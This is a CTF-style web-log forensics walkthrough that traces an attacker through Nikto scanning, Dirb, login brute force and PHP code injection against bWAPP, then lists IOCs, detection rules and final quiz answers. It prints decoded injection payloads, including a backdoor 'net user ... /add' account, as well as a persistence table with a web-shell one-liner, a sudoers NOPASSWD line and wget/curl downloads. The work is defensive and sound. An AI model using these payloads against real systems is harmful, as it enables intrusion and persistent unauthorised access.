PHASE 7 — IDENTIFY THE FOURTH ATTACK
Profile post-login exploitation to answer Q5 and Q6
STEP 17 — Map all post-login activity
Why: After gaining access the attacker’s behavior changes completely. They stop repeating the same request and start navigating. What they navigate to, and what parameters they pass, reveals both the fourth attack type and the specific exploitation technique.
# Full chronological view of all activity after the successful login
grep "Firefox/52.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | tail -20
# All unique post-login endpoints (excluding login.php)
grep "Firefox/52.0" attacker_traffic.log | grep -v "login.php" | awk '{print $6, $7}' | sort | uniq -c | sort -rnThis log — post-login activity sequence:
12:50:10 GET /bWAPP/portal.php 200 (landing page after login)
12:50:15 POST /bWAPP/portal.php 302 (selecting a vulnerability from the menu)
12:50:15 GET /bWAPP/phpi.php 200 (opened PHP Injection page)
12:50:17 GET /bWAPP/phpi.php?message=test 200 (tested the parameter)
12:51:37 GET /bWAPP/phpi.php?message=test 200 (tested again — confirming it works)
12:52:36 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 1)
12:52:46 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 2)
12:52:56 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 3)
12:53:13 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 4)
12:53:23 GET /bWAPP/phpi.php?message=%22%22;... 200 (INJECTION PAYLOAD 4 repeated)The attacker’s methodology visible in this sequence:
1. Land on portal, select a vulnerability category
2. Open the vulnerable page (phpi.php = PHP Injection page)
3. Test with benign input (message=test) twice to confirm the parameter is processed
4. Begin injecting OS commands once confident the parameter is vulnerable
This is systematic, professional reconnaissance-then-exploit behavior — not guessing.
STEP 18 — Identify the attack type from the endpoint and parameter pattern
Why: The endpoint name phpi.php (PHP Injection) and the pattern of the message parameter accepting and apparently executing arbitrary content points to one specific attack category. Confirming this requires looking at the parameter values — even URL-encoded, certain characters are recognizable as injection syntax.
# Extract all raw URL-encoded payloads sent to the injection endpoint
grep "phpi.php" attacker_traffic.log | awk '{print $7}'
# With timestamps to show execution sequence
grep "phpi.php" attacker_traffic.log | awk '{print $4, $7}'
# Check what response body sizes were returned — changing sizes prove dynamic execution
grep "phpi.php" attacker_traffic.log | awk '{print $4, $9, $10}'This log — confirmed raw payloads:
12:50:15 /bWAPP/phpi.php (no param — baseline)
12:50:17 /bWAPP/phpi.php?message=test (benign test)
12:51:37 /bWAPP/phpi.php?message=test (benign test repeated)
12:52:36 /bWAPP/phpi.php?message=%22%22;%20system(%27whoami%27) (PAYLOAD 1)
12:52:46 /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%27) (PAYLOAD 2)
12:52:56 /bWAPP/phpi.php?message=%22%22;%20system(%27net%20share%27) (PAYLOAD 3)
12:53:13 /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) (PAYLOAD 4)
12:53:23 /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) (PAYLOAD 4 repeat)Even before full decoding, the URL-encoded strings reveal:
%22%22=""— empty string used to break PHP string context%3Bor;— semicolon separating PHP statementssystem(— PHP function that executes OS shell commands%27— single quotes wrapping OS commands passed to system()
Response body sizes from the injection requests:
12:50:15 200 12735 (baseline page — no payload)
12:50:17 200 12759 (message=test — 24 bytes larger than baseline)
12:52:36 200 12778 (whoami payload — different size = dynamic output returned)
12:52:46 200 13045 (net user — much larger = command output returned in response)
12:52:56 200 13175 (net share — larger still = share list returned)
12:53:13 200 12755 (net user /add — smaller = brief success/failure message)The changing body sizes are decisive proof of execution: Each injection returns a different body size because the server is including the OS command output in the response HTML. A non-vulnerable page would return identical body sizes regardless of parameter values.
Q5 ANSWER: Code Injection
(Full technical classification: PHP Code Injection executing OS commands via system())
STEP 19 — Decode all payloads
Why: URL-encoded payloads must be fully decoded to understand what OS commands were executed on the victim system. This is non-negotiable for the incident report.
# Decode Payload 1
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27whoami%27)'))
HEREDOC
# Decode Payload 2
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%27)'))
HEREDOC
# Decode Payload 3
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20share%27)'))
HEREDOC
# Decode Payload 4 (the persistence payload)
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOCAlternative — decode all payloads with full context directly from the log:
grep "phpi.php" attacker_traffic.log | \
awk '{print $4, $5, $9, $10, $7}' | \
python3 -c "import sys,urllib.parse;
for line in sys.stdin:
p=line.strip().split()
print(p[0], p[1], p[2], p[3], urllib.parse.unquote(p[4]))"This command outputs each payload with its timestamp, timezone, HTTP status code, and body size alongside the decoded URL — giving full investigative context in a single pass.
URL encoding reference:
| Encoded | Decoded | Role in injection |
|---|---|---|
%22 | " | Double quote — breaks out of PHP string context |
%3B or ; | ; | Semicolon — chains PHP statements |
%20 | | Space — separates command and arguments |
%27 | ' | Single quote — wraps OS command passed to system() |
%2F | / | Forward slash — used in command flags like /add |
Decoded payload table — complete:
| # | Timestamp | Decoded Payload | OS Command | Purpose |
|---|---|---|---|---|
| 1 | 12:52:36 | ""; system('whoami') | whoami | Identify the OS user running the web server |
| 2 | 12:52:46 | ""; system('net user') | net user | List all local user accounts on the system |
| 3 | 12:52:56 | ""; system('net share') | net share | Map all network shares accessible from this machine |
| 4 | 12:53:13 | ""; system('net user hacker Asd123!! /add') | net user hacker Asd123!! /add | Create backdoor account |
| 4 | 12:53:23 | (Payload 4 repeated) | (same) | Confirmation execution |
Injection mechanism — how ""; system('COMMAND') works:
The phpi.php page takes user input via the message parameter and evaluates it as PHP code. The attacker’s injection string exploits this directly:
"" → Empty string satisfies the PHP expression parser
; → Ends the current PHP statement
system('X') → Calls PHP's built-in system() function
system() passes its argument to the OS shell and captures stdout
The output is embedded in the HTTP response bodyThis is why the response body sizes changed with each command — the server was including actual OS command output in the HTML page returned to the attacker.
Q6 ANSWER: whoami
(The first payload injected was system('whoami'), which decodes from %22%22;%20system(%27whoami%27))
PHASE 8 — PERSISTENCE INVESTIGATION
Determine if the attacker planted a persistent foothold — answers Q7
STEP 20 — Understand persistence in the context of web logs
Why: Persistence means the attacker created something that survives beyond the current session — a mechanism to re-enter the system even after the web vulnerability is patched, the session expires, or the machine is rebooted. Web logs record the HTTP requests that triggered these actions. Detecting persistence from logs means identifying OS commands that create lasting artifacts.
Persistence indicators by category:
| Category | OS Command | What it creates |
|---|---|---|
| Account creation (Windows) | net user USERNAME PASS /add | New local user account |
| Privilege escalation (Windows) | net localgroup administrators USERNAME /add | Adds user to admin group |
| Account creation (Linux) | useradd USERNAME or adduser USERNAME | New local user account |
| Sudo access (Linux) | echo 'user ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers | Passwordless sudo |
| Web shell (both) | echo "<?php system($_GET['c']); ?>" > shell.php | Backdoor script on web server |
| Scheduled task (Windows) | schtasks /create /tn ... | Recurring execution |
| Cron job (Linux) | crontab -e or echo ... | crontab | Recurring execution |
| Registry run key (Windows) | reg add HKLM\...\Run /v name /d command | Execute on every boot |
| File download (both) | wget http://... -O filename or curl ... -o filename | Fetch remote payload |
STEP 21 — The correct persistence search method
Why this method is required: All attack payloads in an access log are stored in their URL-encoded form. When an attacker injects net user hacker Asd123!! /add through a URL parameter, the log records it as net%20user%20hacker%20Asd123!!%20/add — with spaces encoded as %20. Searching for plaintext terms such as net user or useradd directly against the raw log will return no results because those exact strings do not exist in the file as written. Every persistence search must account for URL encoding or first decode the payloads before searching.
What this achieves: By using URL-encoded search patterns or working against decoded output, you accurately detect all persistence-related commands the attacker may have injected — including account creation, privilege escalation, scheduled tasks, web shell planting, file downloads, and registry modifications — regardless of how they were encoded in transit.
Variation A — search for URL-encoded patterns directly in the log:
# Windows account creation — net user with /add flag
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"
# Validate with the exact known pattern
grep "net%20user%20hacker" attacker_traffic.log
# Linux account creation
grep "phpi.php" attacker_traffic.log | grep -i "useradd\|adduser\|user%20add"
# Privilege escalation via group membership
grep "phpi.php" attacker_traffic.log | grep -i "localgroup\|sudoers\|sudo"
# File writing — web shell creation
grep "phpi.php" attacker_traffic.log | grep -i "echo.*php\|echo.*shell\|echo.*cmd"
# File download
grep "phpi.php" attacker_traffic.log | grep -i "wget\|curl%20\|curl+"
# Scheduled persistence
grep "phpi.php" attacker_traffic.log | grep -i "schtask\|crontab\|at%20"
# Registry persistence
grep "phpi.php" attacker_traffic.log | grep -i "reg%20add\|HKLM\|HKCU"Variation B — decode all payloads first, then search the decoded output:
# Extract and decode all phpi.php parameters, save to a decoded file
grep "phpi.php" attacker_traffic.log | awk '{print $7}' | python3 -c "
import sys, urllib.parse
for line in sys.stdin:
print(urllib.parse.unquote(line.strip()))
" > decoded_payloads.log
# View all decoded payloads
cat decoded_payloads.log
# Search decoded output using plaintext terms — all persistence categories
grep -i "net user.*add\|useradd\|adduser" decoded_payloads.log
grep -i "localgroup\|administrators\|sudo" decoded_payloads.log
grep -i "echo.*php\|shell\|webshell" decoded_payloads.log
grep -i "wget\|curl" decoded_payloads.log
grep -i "schtasks\|crontab\|cron" decoded_payloads.log
grep -i "reg add\|registry" decoded_payloads.logWhy Variation B is superior for complex investigations:
Searching decoded text eliminates the need to manually translate every persistence indicator into its URL-encoded form. In logs with many payloads or novel encoding, decoding first and searching second is more reliable and catches edge cases.
STEP 22 — Execute the persistence search and identify the payload
# PRIMARY SEARCH — Windows account creation via net user
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"This log — confirmed results:
192.168.199.2 - - [20/Jun/2021:12:53:13 +0300] "GET /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) HTTP/1.1" 200 12755 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.199.2 - - [20/Jun/2021:12:53:23 +0300] "GET /bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27) HTTP/1.1" 200 12755 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"All other persistence categories return no results — confirmed absent:
| Search | Result | Conclusion |
|---|---|---|
grep -i "useradd\|adduser" | No output | No Linux user creation attempted |
grep -i "localgroup\|sudoers" | No output | No privilege escalation in injection phase |
grep -i "echo.*php\|wget\|curl" | No output | No web shell or file download attempted |
grep -i "schtask\|crontab" | No output | No scheduled task created |
grep -i "reg%20add\|HKLM" | No output | No registry modification attempted |
Important scoping note: Running grep "localgroup\|administrators" against the full attacker_traffic.log without the phpi.php filter returns results — but they are Nikto and Dirb scanning probes like GET /bwapp/administrators/ 404 and GET /bwapp/_vti_pvt/administrators.pwd 404. These are reconnaissance requests, not injected commands. Always scope persistence searches to the injection endpoint (phpi.php) to prevent false positives from earlier scanning phases.
STEP 23 — Extract and document the persistence payload precisely
Why: The incident report and containment response require the exact payload in the exact format it appeared in the log. Additionally, confirming the payload executed successfully (HTTP 200 with consistent body size) establishes that the backdoor account was likely created on the victim system.
# Confirm the payload and its HTTP response
grep "net%20user%20hacker" attacker_traffic.log
# Verify the server returned HTTP 200 (payload was processed)
grep "net%20user%20hacker" attacker_traffic.log | awk '{print $9, $10}'
# Decode the persistence payload
python3 << 'HEREDOC'
import urllib.parse
print(urllib.parse.unquote('%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)'))
HEREDOCThis log — confirmed results:
Response codes: 200 12755 (both executions)
200 12755 (identical body sizes)
Decoded payload: ""; system('net user hacker Asd123!! /add')Why both executions returned body size 12755:
The net user ... /add command produces a brief text output (“The command completed successfully.” or similar). Both executions returned the same body size, meaning the same response was served twice — consistent with the command executing successfully both times.
Why it was executed twice:
When injecting commands through a web application without direct terminal access, the attacker cannot see stderr or confirm execution status. Running the same persistence command twice at a 10-second interval is standard practice to ensure it executed. The identical response sizes suggest both ran without error.
Operational impact:
net user hacker Asd123!! /add creates a local Windows user account named hacker with password Asd123!!. This account:
- Persists across reboots
- Persists after the web application vulnerability is patched
- Can be used for direct login via RDP (port 3389), SMB (port 445), or any service accepting local Windows credentials
- Provides re-entry to the victim machine independent of the web application
STEP 24 — Record the persistence payload in both formats
Why: The forensically precise representation of the payload is the raw URL-encoded inner command exactly as it appears in the log — this is what was transmitted over the network and what constitutes the evidence in the log file.
Raw URL-encoded persistence payload (as it appears in the log):
%27net%20user%20hacker%20Asd123!!%20/add%27Breaking down this exact string:
%27 → ' (opening single quote)
net → net (literal — not encoded)
%20 → (space)
user → user (literal)
%20 → (space)
hacker → hacker (literal)
%20 → (space)
Asd123!! → Asd123!! (literal — the !! is NOT URL-encoded in the log)
%20 → (space)
/add → /add (literal — the / is NOT URL-encoded in the log)
%27 → ' (closing single quote)Complete URL parameter as it appears in the log:
/bWAPP/phpi.php?message=%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)Q7 ANSWER: Yes — persistence was established.
Related payload: %27net%20user%20hacker%20Asd123!!%20/add%27
PHASE 9 — FINAL VERIFICATION AND CLOSURE
Confirm all attacker traffic is accounted for before closing the investigation
STEP 25 — Verify total traffic attribution
Why: Before declaring an investigation complete, a SOC analyst must confirm that every request from the attacker IP has been categorised into a known phase. Unaccounted traffic is a red flag — it may represent an additional attack vector, a tool phase you missed, or a second attacker entirely. The investigation cannot be closed until the arithmetic balances to zero remainder.
The correct method for this log:
The three confirmed tool phases were identified by their User-Agent strings. The cleanest way to surface unaccounted traffic is therefore to subtract those three populations from the total using chained grep -v (invert match) commands. This approach searches the entire raw line — not just a parsed field — which means it is immune to the field-misalignment problem that affects awk -F'"' on structurally malformed lines.
# Step 1 — Establish the total attacker request count
grep "192.168.199.2" access.log | wc -l
# Step 2 — Count each confirmed phase
grep "Nikto" attacker_traffic.log | wc -l
grep "MSIE 6.0" attacker_traffic.log | wc -l
grep "Firefox/52.0" attacker_traffic.log | wc -l
# Step 3 — Isolate exactly what remains: lines that match NONE of the three known tools
grep -v "Nikto" attacker_traffic.log \
| grep -v "MSIE 6.0" \
| grep -v "Firefox/52.0" \
| wc -l
# Step 4 — Identify the User-Agents of the remaining lines
grep -v "Nikto" attacker_traffic.log \
| grep -v "MSIE 6.0" \
| grep -v "Firefox/52.0" \
| awk -F'"' '{print $6}' | sort | uniq -c | sort -rn
# Step 5 — Inspect all 83 raw lines to confirm their content and phase
grep -v "Nikto" attacker_traffic.log \
| grep -v "MSIE 6.0" \
| grep -v "Firefox/52.0"
# Step 6 — Confirm the investigation closes cleanly at the last known event
grep "192.168.199.2" access.log | tail -5This log — confirmed terminal results:
Step 1 — Total:
12528
Step 2 — Phase counts:
7455 Nikto
4816 MSIE 6.0
174 Firefox/52.0
Step 3 — Unaccounted count:
83
Step 4 — User-Agent breakdown of the 83 lines:
74 - (null UA — no User-Agent header sent at all)
5 ./.\\\ (Nikto path traversal evasion — UA set to a traversal string)
4 (empty string UA — blank UA header sent)
--
83 total ✓
Step 5 — Raw line content of the 83 (representative sample):
12:36:24 GET /bwapp/4RaXX5Ac.xml 400 (Nikto extension probe)
12:36:33 GET /bwapp/site/' UNION 400 (SQL injection test)
12:36:33 GET /bwapp/postnuke/...XSS payload... 400 (XSS injection test)
12:36:34 GET /bwapp/index.php?action=search&...XSS... 400 (XSS injection test)
12:36:34 GET /bwapp/cgi-bin/handler/...cat /etc/passwd 400 (OS command injection test)
12:36:39 GET /bwapp/forum.asp?n=../../boot.ini|...SQL... 400 (Path traversal + SQLi test)
12:36:46 GET /bwapp/...?mfh_root_path=http://cirt.net/.. 400 (RFI probe)
12:36:54 <script>alert(1)</script> /bwapp/ HTTP/1.1 400 (XSS injected into method field)
12:36:56 GET /bwapp/MediaServerDevDesc.xml 400 (Service discovery probe)
(... 74 additional lines, all within the 12:36:24–12:36:57 Phase 1 window)
Step 6 — Final 5 lines in the log:
12:52:36 GET /bWAPP/phpi.php?message=...whoami... 200 Firefox/52.0
12:52:46 GET /bWAPP/phpi.php?message=...net user... 200 Firefox/52.0
12:52:56 GET /bWAPP/phpi.php?message=...net share... 200 Firefox/52.0
12:53:13 GET /bWAPP/phpi.php?message=...hacker.../add 200 Firefox/52.0
12:53:23 GET /bWAPP/phpi.php?message=...hacker.../add 200 Firefox/52.0Analysis of the 83 unaccounted lines:
All 83 lines fall within the Phase 1 time window (12:36:24 → 12:36:57) and contain Nikto’s characteristic probe patterns — random extension strings, cirt.net/rfiinc.txt RFI payloads, path traversal sequences, XSS test strings, and SQL injection fragments. They are Nikto Phase 1 requests where Nikto deliberately suppressed or replaced its standard User-Agent header as part of its built-in evasion test battery.
Why grep "Nikto" missed them: Nikto’s evasion tests intentionally omit or replace the Nikto string from the User-Agent for those specific requests. Because our Phase 1 count (grep "Nikto" | wc -l) only matches lines containing the literal string “Nikto”, these 83 evasion-mode lines were correctly excluded from that count. They are not missing — they were deliberately held out of the Phase 1 UA bucket so the unaccounted step would surface them explicitly.
Why awk -F'"' works correctly on these 83 lines: The structurally malformed lines identified in Step 2B all contain the Nikto attack payload text and therefore all contain the string “Nikto” — they are filtered out by grep -v "Nikto" before awk -F'"' ever sees them. The 83 lines that reach awk are all well-formed log entries (all returned 400 326), so the quote-delimited field extraction produces clean, accurate results: 74 -, 5 ./.\\\, 4 (empty).
UA breakdown explained:
| User-Agent | Count | What it means |
|---|---|---|
- (null) | 74 | Nikto sent these requests with no UA header at all — the server logs a literal - in the UA position. Nikto uses this to test whether the target blocks scanner UAs. |
./.\\\ (traversal string) | 5 | Nikto set its UA to a path traversal string (./.\\\) to test whether the server or WAF treats the UA field as an injection point. |
(empty string) | 4 | Nikto sent a blank UA string. Functionally similar to null but technically distinct — an empty string vs an absent header. |
Final arithmetic — complete traffic reconciliation:
Phase 1 Nikto (standard UA lines) 7,455
Phase 1 Nikto (evasion UA lines) 83 ← surfaced by this step
Phase 2 Dirb 4,816
Phase 3 Firefox/52.0 (brute force) 174 (includes Phase 4 injection)
------
Total 12,528 ✓
Cross-check A: 12,445 (grep subtotal) + 83 (evasion) = 12,528 ✓
Cross-check B: 7,455 + 83 + 4,816 + 174 = 12,528 ✓All 12,528 attacker requests are fully attributed. The unaccounted remainder is zero. The last five entries in the log are the final Phase 4 injection payloads — the investigation closes at the exact moment the attacker executed their persistence command for the second time at 12:53:23. No post-persistence activity, no cleanup, no additional phases. Investigation is complete.
STEP 26 — Complete incident summary
INCIDENT SUMMARY
================
Log File: access.log
Attacker IP: 192.168.199.2
Target IP/App: 192.168.199.5 / bWAPP (buggy web application)
Total Requests: 12,528 (99.77% of all traffic in the log)
Incident Window: 20/Jun/2021 12:36:24 → 12:53:23 (17 min 1 sec)
ATTACK PHASE SEQUENCE:
Phase 1 — Web Reconnaissance [Q1: nikto]
Tool: Nikto v2.1.6
UA: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None)
Timeframe: 12:36:24 → 12:36:57 (33 seconds)
Volume: 7,455 requests
Activity: Automated scan for CVEs, dangerous files, misconfigurations
Shellshock probe (CVE-2014-6271), extension enumeration
Findings: bWAPP application on /bWAPP/, login page at /bWAPP/login.php
Phase 2 — Directory Listing Discovery [Q2: directory brute force]
Technique: Directory Brute Force
Tool: Dirb
UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Note: UA confirmed as Dirb's known default; behavior-verified
Timeframe: 12:37:50 → 12:38:02 (~12 seconds)
Volume: 4,816 requests
Activity: Wordlist-based directory and file enumeration
Result: Predominantly 404 — mapped accessible paths
[ATTACKER GAP: 3 min 32 sec — reviewing results, selecting next tool]
Phase 3 — Third Attack [Q3: Brute force | Q4: Yes]
Technique: Brute Force (Login Credential Brute Force)
UA: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Firefox/52.0
Timeframe: 12:41:34 → 12:49:35 (~8 minutes)
Volume: 134 POST requests to /bWAPP/login.php
Failures: 132 × HTTP 200, body 4086 bytes (identical failed-login page)
Success: 2 × HTTP 302 (redirect = valid credentials found)
Breach: First successful login: 12:49:35
Result: Authenticated access to bWAPP portal confirmed at 12:50:10
Phase 4 — Fourth Attack [Q5: Code Injection | Q6: whoami]
Technique: PHP Code Injection / OS Command Injection
Endpoint: /bWAPP/phpi.php?message=
Timeframe: 12:50:15 → 12:53:23 (~3 minutes)
Volume: 8 injection requests (2 test, 6 live payloads)
Payload sequence:
12:50:17 message=test (parameter probe — benign)
12:51:37 message=test (probe repeated — confirmed working)
12:52:36 system('whoami') → Q6 ANSWER (identify OS user)
12:52:46 system('net user') (enumerate local accounts)
12:52:56 system('net share') (enumerate network shares)
12:53:13 system('net user hacker Asd123!! /add') → Q7 ANSWER (PERSISTENCE)
12:53:23 system('net user hacker Asd123!! /add') (repeated for confirmation)
All payloads: HTTP 200 with varying body sizes — all executed successfully
Persistence: [Q7: Yes]
Method: Windows local user account creation via net user /add
Account: Username: hacker | Password: Asd123!!
Payload: %27net%20user%20hacker%20Asd123!!%20/add%27
Executed: 12:53:13 (confirmed again at 12:53:23)
Impact: Backdoor account survives patching, reboots, and session expirySTEP 27 — Indicators of Compromise (IOCs)
Document these IOCs and submit them to your threat intelligence platform and detection engineering team immediately upon investigation closure.
INDICATORS OF COMPROMISE
=========================
Network IOCs:
Attacker IP: 192.168.199.2
Target IP: 192.168.199.5
Protocol: HTTP (port 80)
Incident Date: 20 Jun 2021
Tool Signatures (User-Agent IOCs):
Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:*)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) [Dirb default UA]
Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Endpoint IOCs:
/bWAPP/phpi.php [Exploited PHP Injection page]
/bWAPP/login.php [Brute-forced login page]
Payload IOCs (URL-encoded):
%22%22;%20system(%27whoami%27)
%22%22;%20system(%27net%20user%27)
%22%22;%20system(%27net%20share%27)
%22%22;%20system(%27net%20user%20hacker%20Asd123!!%20/add%27)
Host IOCs (victim system — Windows):
New local user account: hacker
Account password: Asd123!!
Creation method: net user hacker Asd123!! /add
Access vectors enabled: RDP (TCP/3389), SMB (TCP/445), local Windows auth
Recommended detections to create:
1. Alert on any User-Agent matching Nikto/2.x.x pattern
2. Alert on MSIE 6.0 UA string (no legitimate usage since ~2008)
3. Alert on >50 POST requests to the same login endpoint within 5 minutes from one IP
4. Alert on HTTP 302 following a sequence of 200s on a login endpoint
5. Alert on URL parameters containing system(, exec(, passthru(, shell_exec(
6. Alert on net%20user.*%2Fadd or net user.*/add in web server logsFINAL ANSWERS — ALL 7 QUESTIONS
| # | Question | Answer |
|---|---|---|
| Q1 | Which automated scan tool did the attacker use for web reconnaissance? | nikto |
| Q2 | Which technique did the attacker use for directory listing discovery? | directory brute force |
| Q3 | What is the third attack type after directory listing discovery? | Brute force |
| Q4 | Is the third attack successful? | Yes |
| Q5 | What is the name of the fourth attack? | Code Injection |
| Q6 | What is the first payload for the fourth attack? | whoami |
| Q7 | Is there any persistency clue? If yes, what is the related payload? | Yes — %27net%20user%20hacker%20Asd123!!%20/add%27 |
COMPLETE KILL CHAIN
12:36:24 PHASE 1 ─── Web Reconnaissance (Nikto v2.1.6) [Q1: nikto]
│ 7,455 requests in 33 seconds
│ Scanned CVEs, file extensions, shellshock, misconfigurations
│ Located bWAPP application and login page structure
▼
12:37:50 PHASE 2 ─── Directory Brute Force (Dirb) [Q2: directory brute force]
│ 4,816 requests in ~12 seconds
│ Enumerated directory structure via wordlist
│ Mapped accessible paths on the target application
▼
[3 min 32 sec — attacker reviewing results, setting up next tool]
▼
12:41:34 PHASE 3 ─── Brute Force Attack (Login) [Q3: Brute force]
│ 134 POST requests to /bWAPP/login.php over ~8 minutes
│ 132 failures: HTTP 200, body 4086 bytes (identical fail page)
│ 2 successes: HTTP 302 at 12:49:35 [Q4: Yes]
│ Portal.php loaded with HTTP 200 at 12:50:10
▼
12:50:15 PHASE 4 ─── Code Injection (PHP + OS Command) [Q5: Code Injection]
│ Navigated to phpi.php (PHP Injection vulnerable page)
│ Tested parameter with benign input — confirmed injectable
│ 12:52:36 → system('whoami') [Q6: whoami]
│ 12:52:46 → system('net user')
│ 12:52:56 → system('net share')
│ 12:53:13 → system('net user hacker Asd123!! /add') [Q7: Yes]
│ 12:53:23 → system('net user hacker Asd123!! /add') (confirmed)
└── Backdoor account "hacker / Asd123!!" created on victim machineQUICK REFERENCE — ALL COMMANDS IN SEQUENCE
# ─── PHASE 1: SCOPE ──────────────────────────────────────────────────────────
wc -l access.log
head -1 access.log | awk '{print $4, $5}'
tail -1 access.log | awk '{print $4, $5}'
# Step 2A — format verification
head -3 access.log
head -1 access.log | awk '{print NF}'
# Step 2B — log integrity check (Part A: compliance count)
grep -Ec '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
# Step 2B — log integrity check (Part B: isolate malformed lines)
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log | wc -l
# ─── PHASE 2: IDENTIFY ATTACKER ──────────────────────────────────────────────
awk '{print $1}' access.log | sort | uniq -c | sort -rn
grep "192.168.199.2" access.log | head -20
grep "192.168.199.2" access.log | tail -20
grep "192.168.199.2" access.log > attacker_traffic.log
wc -l attacker_traffic.log
# ─── PHASE 3: FINGERPRINT TOOLS — Q1, Q2 ─────────────────────────────────────
# Full UA inventory — all IPs, unfiltered, verbose Nikto output expected
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr
# IP + UA correlation — Nikto variants collapsed, clean triage view
awk -F'"' '{split($1, a, " "); print a[1], $6}' access.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr
# Attacker-only UA detail (run after attacker_traffic.log is created)
awk -F'"' '{print $6}' attacker_traffic.log | sort | uniq -c | sort -rn
grep "Nikto" attacker_traffic.log | wc -l
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | wc -l
grep "MSIE 6.0" attacker_traffic.log | awk '{print $7}' | head -20
grep "MSIE 6.0" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4}' | sort | uniq -c
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | head -30
# ─── PHASE 4: TIMELINE ────────────────────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Firefox/52.0" attacker_traffic.log | tail -1 | awk '{print $4}'
# ─── PHASE 5: PROFILE PHASE 3 — Q3 ───────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log > phase3_traffic.log
wc -l phase3_traffic.log
awk '{print $6}' phase3_traffic.log | sort | uniq -c
awk '{print $6, $7}' phase3_traffic.log | sort | uniq -c | sort -rn
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9}' | sort | uniq -c
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9, $10}' | sort | uniq -c
grep "POST /bWAPP/login.php" attacker_traffic.log | wc -l
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $4}' | head -15
# ─── PHASE 6: CONFIRM SUCCESS — Q4 ───────────────────────────────────────────
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 "
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | wc -l
grep "Firefox/52.0" attacker_traffic.log | grep -A5 "POST /bWAPP/login.php.*302"
grep "Firefox/52.0" attacker_traffic.log | grep "portal.php"
# ─── PHASE 7: FOURTH ATTACK — Q5, Q6 ────────────────────────────────────────
grep "Firefox/52.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | tail -20
grep "phpi.php" attacker_traffic.log | awk '{print $4, $7}'
grep "phpi.php" attacker_traffic.log | awk '{print $4, $9, $10}'
# Decode all payloads with full context
grep "phpi.php" attacker_traffic.log | \
awk '{print $4, $5, $9, $10, $7}' | \
python3 -c "import sys,urllib.parse;
for line in sys.stdin:
p=line.strip().split()
print(p[0], p[1], p[2], p[3], urllib.parse.unquote(p[4]))"
# ─── PHASE 8: PERSISTENCE — Q7 ───────────────────────────────────────────────
# PRIMARY: URL-encoded search for Windows account creation
grep "phpi.php" attacker_traffic.log | grep -i "net%20user.*add"
grep "net%20user%20hacker" attacker_traffic.log
# SECONDARY: decode everything first, then search decoded output
grep "phpi.php" attacker_traffic.log | awk '{print $7}' | python3 -c "
import sys, urllib.parse
for line in sys.stdin:
print(urllib.parse.unquote(line.strip()))
" > decoded_payloads.log
grep -i "net user.*add\|useradd\|adduser" decoded_payloads.log
grep -i "localgroup\|sudo\|administrators" decoded_payloads.log
grep -i "echo.*php\|wget\|curl" decoded_payloads.log
grep -i "schtasks\|crontab" decoded_payloads.log
grep -i "reg add\|HKLM\|HKCU" decoded_payloads.log
# Confirm execution (HTTP 200 = processed by server)
grep "net%20user%20hacker" attacker_traffic.log | awk '{print $9, $10}'
# Decode persistence payload
